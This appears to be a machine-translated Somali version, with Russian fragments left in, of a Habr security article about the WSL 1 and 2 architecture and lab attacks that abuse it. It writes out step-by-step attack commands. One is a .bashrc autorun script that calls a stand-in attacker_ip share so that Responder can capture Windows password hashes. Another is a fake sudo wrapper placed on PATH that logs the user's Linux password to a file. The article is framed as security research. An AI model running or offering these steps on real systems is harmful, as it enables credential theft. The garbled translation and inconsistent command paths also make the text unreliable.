Hello, habr! OTUS waxay bilawday qulqulka koorsada bisha Oktoobar . Iyadoo la filayo bilowga koorsada, waxaan kula wadaageynaa maqaal uu qoray mid ka mid ah macalimiinteena, Alexander Kolesnikov.
2016, Microsoft waxay soo bandhigtay tignoolajiyada cusub ee WSL bulshada ITWindows Subsystem ee Linux), taas oo mustaqbalka suurto gelisay in la mideeyo tartameyaal aan hore loo heshiin oo u dagaallamayay caannimada isticmaalayaasha OS caadiga ah iyo kuwa horumarsan labadaba: Windows iyo Linux. Farsamadani waxay suurtogal ka dhigtay in la isticmaalo qalabka Linux OS ee jawiga Windows iyada oo aan loo baahnayn Linux, tusaale ahaan, adoo isticmaalaya Multi-boot. Habr waxaad ka heli kartaa tiro badan oo maqaallo ah oo qeexaya faa'iidooyinka isticmaalka WSL. Si kastaba ha noqotee, nasiib daro, wakhtiga abuurista maqaalkan, ma jiraan daraasado ku saabsan amniga calaamadda nidaamyada hawlgalka ee laga helay ilahan. Qoraalkani wuxuu noqon doonaa isku day lagu saxayo tan. Maqaalku wuxuu ka hadli doonaa sifooyinka dhismaha WSL 1 iyo 2 oo baari doona dhowr tusaale oo weeraro ah oo ku saabsan hababka isticmaalaya teknoolajiyada. Maqaalku wuxuu u qaybsan yahay 2 qaybood. Midka ugu horreeya wuxuu bixin doonaa hababka weerarka aragtida ugu weyn ee Linux iyo Windows. Maqaalka labaad wuxuu ku lug yeelan doonaa dejinta jawi tijaabo ah iyo soo saarista weerarrada.
WSL 1: sifooyinka dhismaha
Sida ugu saxsan ee loogu quusto arrimaha amniga WSL, waxaa lagama maarmaan ah in la go'aamiyo nuancesyada ugu muhiimsan ee la xiriira hirgelinta nidaamka hoose. Mid ka mid ah hawlaha ugu muhiimsan ee adeegsadaha ee ay xalliso WSL waa awoodda ay kaga dhex shaqayn karto marinka Linux ee martigeliyaha ku shaqeeya Windows OS. Sidoo kale, iswaafajinta la soo bandhigay waxay ahayd mid asal ah oo Linux executables (ELFs) si toos ah loogu shaqeyn karo nidaamka Windows. Si loo gaaro yoolalkan, nidaam hoose oo gaar ah ayaa la sameeyay Windows 10 kaas oo kuu oggolaanaya inaad ku socodsiiso codsiyada Linux adoo adeegsanaya nidaam wicitaanno gaar ah - sidaas darteed, waxaa la isku dayay in la khariideeyo set of syscalls Linux on Windows. Tan waxa la hirgaliyay jir ahaan iyadoo lagu daray darawallo cusub iyo qaab cusub oo habsocod ah. Muuqaal ahaan dhismuhu wuxuu u ekaa sidan:
Dhab ahaantii, isdhexgalka nidaamka hawlgalka Linux waxaa lagu abaabulay iyada oo loo marayo dhowr qaybood oo kernel ah iyo nooc gaar ah oo habka - pico. Laga soo bilaabo jaantuska kore, waxaad arki kartaa in habka ku shaqeeya tusaale ahaan Linux ee martida loo yahay uu yahay mid asal ah oo ay tahay inuu isticmaalo ilo la mid ah codsiyada caadiga ah ee Windows. Laakiin sida loo gaaro tan? Mashruuca Fikradaha habka loogu talagalay Windows ayaa la sameeyay kuwaas oo bixiyay dhammaan qaybaha lagama maarmaanka ah ee nidaamka hawlgalka (iyadoo ku xiran nooca) si loo socodsiiyo codsiga OS kale.
Ogsoonow in soo jeedinta la soo jeediyay ay suurtogal ka dhigtay in aan diiradda la saarin nidaamka hawlgalka (gaar ahaan, Windows), kaas oo habka OS kale la filayo inuu bilaabo, oo soo jeediyay hab guud.
Markaa, codsi kasta oo ku jira nidaamka pico wuxuu socon karaa iyada oo aan loo eegin kernel-ka Windows:
- Dhibaatooyinka iswaafajinta iyo tarjumaada wicitaanada nidaamka waa in ay xalliyaan bixiyeyaasha gaarka ah;
- Xakamaynta gelitaanka waa in lagu sameeyaa Kormeeraha Amniga. Kormeeruhu wuxuu ku yaalaa kernel-ka sidaas darteed Windows wuxuu u baahday cusboonaysiin qaab darawal cusub oo u dhaqmi kara sidii bixiye hababkan oo kale ah. Habka pico prototype waxa si habaysan loo soo bandhigay hoos:
Maadaama nidaamka faylka Linux uu isticmaalo faylka xasaasiga ah iyo magacyada tusaha, 2 nooc oo nidaamka faylka ah ayaa lagu daray Windows si ay ula shaqeeyaan WSL - VolFS iyo DriveFS. VolFS waa hirgelinta nidaamka faylka Linux, DriveFS waa nidaam faylal ah oo u shaqeeya si waafaqsan xeerarka Windows, laakiin awood u leh inuu doorto dareenka kiiska.
WSL 2
WSL 1 waxay lahayd tiro xaddidaad ah oo aan u oggolaan in loo isticmaalo xallinta tirada ugu badan ee hawlaha: tusaale ahaan, ma aysan lahayn awood ay ku socodsiiso codsiyada Linux 32-bit, mana suurtagal ahayn in la isticmaalo darawallada qalabka. Sidaa darteed, 2020, WSL 2 ayaa la sii daayay, taas oo bedeshay habka loo dhisayo nidaamka hoose. WSL 2 waa mashiinka farsamada gacanta ee la hagaajiyay kaas oo u dhigma sifooyinka isticmaalka kheyraadka ee WSL 1. Hadda, iyadoo ku xiran dhibaatooyinka uu xalliyo isticmaalaha Windows OS, waxaad dooran kartaa nooca loo baahan yahay ee nidaamka hoose ee Linux. Si loo yareeyo dayacanka suurtagalka ah, WSL 2 waxaa la hirgaliyay iyadoo lagu salaynayo Hyper-V in Windows 10. Foomkan, Windows waxay awood u leedahay inay ku socodsiiso kernelka nidaamka Linux si gooni ah. Waxaa mudan in la xasuusto in nooca 1 ee WSL loo soo bandhigay qaab beta ah oo la rabay inuu muujiyo jihada horumarka Windows ee aaggan, markaa u gudubka Hyper-V wuxuu ahaa lama huraan. Nashqada ugu dambeysa waxay u egtahay sidan:
Noocaan, kernels-yada Windows iyo Linux waxay leeyihiin kheyraad u gaar ah, isgoyskuna wuxuu ku dhex jiraa nidaamka faylka, laakiin isgoyskani ma dhameystirna. Isdhexgalka ka dhexeeya nidaamyada faylalka waxaa lagu fuliyaa iyada oo loo marayo duubka-server-ka macmiilka kaas oo ka shaqeeya isticmaalka borotokoolka 9P.
Maanta Microsoft waxay bixisaa awooda ay ku kala beddesho WSL 1 iyo WSL 2. Labada noocba waa diyaar si loo isticmaalo.
Amniga WSL
Waqtigan xaadirka ah, waxaa jira dhowr shaqo oo qeexaya qaar ka mid ah hababka loo isticmaalo aaladaha OS ee sharciga ah si loo weeraro xiriirka ka dhexeeya nidaamyada hoose. Waxaan u isticmaali doonaa qoraaladooda si aan u hubinno ku habboonaanta weerarrada waqtiga qorista. Liiska guud ee weerarada iyo xaaladaha:
1. Hirgelinta nidaamka faylka: xuquuqaha gelitaanka, helitaanka hagayaal la wadaago/hababka is-weydaarsiga xogta.
Cilmi-baaris ayaa la sameeyay si loo go'aamiyo xadgudubyada sharciyada gelitaanka Linux FS->Windows FS, Windows FS->Linux FS. Cilmi baaris ayaa muujisay awoodda wax looga beddelo faylka la bixiyay gudaha bartilmaameedka OS. Waxa kale oo la isku dayey in la beddelo, la sameeyo nuqullo oo la tirtiro qayb ka mid ah nidaamyada faylka.
Muuqaal:
- A. Weerar ka yimid nidaamka hawlgalka Windows - wax ka beddelka faylalka / iwm ee Linux OS.
- B. Weerar ka yimid nidaamka hawlgalka Linux - wax ka beddelka faylasha ku jira hagaha:
C:Windows,C:Program Files,C:Users<User>
2. Hirgelinta isku xidhka shabakada.
Cilmi-baarista waxaa la sameeyay iyadoo la adeegsanayo tusaalayaal weerarro ka yimid nidaamka hawlgalka Linux ee Windows. Tilmaamaha xirmooyinka shabakada ayaa la isticmaalay, kuwaas oo ah, hababka xaqiijinta ee ilaha kala duwan.
Muuqaal:
- Furitaanka marinka deked ku jirta nidaamka Windows
- Furitaanka deked aan lahayn xuquuqaha ku habboon
- Ku socodsiinta qolofka gadaale iyadoo la adeegsanayo faylka elf ee nidaamka hawlgalka Windows.
3. Qarinta bilaabista hababka software xaasidnimada leh iyadoo la adeegsanayo nidaamka hoose ee WSL.
Cilmi-baadhistu waxay ku salaysan tahay xaqiiqo fudud - nidaamyada ammaanku kama joojin karaan dhacdooyinka kernel kale ee ka shaqeeya isticmaalka bixiye sharci ah oo ka socda nidaamka hawlgalka ee kiiska WSL 1. Xaaladda WSL 2, ma jirto si loo eego dhacdooyinka dhacaya. kernel gaar ah oo ku dhex jira mashiinka farsamada fudud ee fudud.
Muuqaal:
1) Bilow arjiga gelitaanka fog ee nidaamka oo arag dhacdooyinka la soo galiyay.
Tijaabooyinka WSL 1: dhexda xashiish (Windows)
Ugu dambayntii waxa aanu gaadhnay qaybta la taaban karo. Marka hore, waxaad u baahan tahay inaad dejiso jawiga imtixaanka. Dhammaan tijaabooyinka waxaa lagu sameyn doonaa kursiga keydka leh Windows 10 2004. Sawirka Ubuntu 18.04 waxaa loo doortay sida nidaamka hawlgalka ee WSL. Sawirka waxaa lagu doortay si aan kala sooc lahayn, mid kasta oo kale ayaa u shaqayn doona si la mid ah. Awaamiirta dejinta istaagida:
Waa inaad marka hore furto powershell.exe maamul ahaan.
WSL 1 waxaad u baahan tahay inaad socodsiiso amarada:
- Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux #Включить функцию WSL
- Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804
-OutFile ~/Ubuntu.appx -UseBasicParsing #Загрузить образ Linux из магазина Microsoft
Ubuntu.appx install —root #Установим образ
Возможно, придется прокликать процесс настройки и создать нового пользователя, который будет иметь меньше прав, чем root. Для наших тестов это будет обычный пользователь sam.
Restart-Computer #Перезагрузим
Ka dib markaad dib u kiciso istaagga, waxaad wici kartaa amarka bash. Haddii wax waliba si sax ah u shaqeeyeen, waxaad ku arki doontaa wax soo saarka tan oo kale gudaha console Windows:
Waxaan u isticmaali doonaa qaybinta Kali Linux sidii mashiinka weerarka; dhammaan mashiinnada waa inay ku jiraan shabakad isku mid ah.
Aynu ka soo qaadno in aan fursad la'aan ugu haysanno WSL mashiinka Windows. Aan isku dayno inaan weerarno nidaamka hawlgalka Linux anagoo ka wacaya amar Linux ah. Si loo fuliyo weerarka, waxaan isticmaali doonaa farsamo autorun fudud - waxaan ku dari doonaa our script for fulinta deegaanka Linux ah. Si aad tan u samayso waxaad u baahan tahay inaad beddesho faylka .bashrc.
Mashiinka WSL leh waxaanu ku fulinaa:
1. bash
2. Переходим в домашнюю директорию пользователя: cd /home/sam/
2. echo «/home/sam/.attack.sh» >> .bashrc
3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
4. chmod u+x .attack.sh
5. exitMashiinka Kali Linux waxaan ku wadnaa:
1. Responder -I eth0 -rdvwMashiinka Daaqadaha, aynu bilowno bash.
Waxaan ku sugeynaa natiijada mashiinka Kali Linux:
Markaa, waxaanu ku helnay hashes isticmaale Windows-ka iyada oo loo marayo nidaamka hoosaadka WSL anagoo fulinayna amarka nidaamka Linux.
Tijaabooyinka WSL 1: helitaanka erayga sirta ah ee isticmaalaha (Linux OS)
Aan sameyno hal tijaabo oo kale. Inta jeegan lagu jiro waxaanu ku dari doonaa faylka .bashrc amarro badan si loo helo erayga sirta ah ee isticmaalaha nidaamka hawlgalka Linux.
Aynu bilowno bash oo geli amarrada:
1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit
Si loo dhammeeyo weerarka, isticmaaluhu Sam wuxuu u baahan yahay inuu waco sudo gudaha Linux terminalka. Taas ka dib, erayga sirta ah ee isticmaalaha Linux OS wuxuu ku jiri doonaa faylka pass.txt:
Hirgelinta weerarrada waxaa loo bixiyay macluumaadka aragtida oo kaliya.
Qaybta soo socota ee maqaalku waxay sharxi doontaa hirgelinta borotokoolka 9P, tixgeli abuurista scanner borotokoolkan, iyo sidoo kale qaado weerar adoo isticmaalaya.
Liiska suugaanta la adeegsaday
Akhri wax dheeraad ah
Source: www.habr.com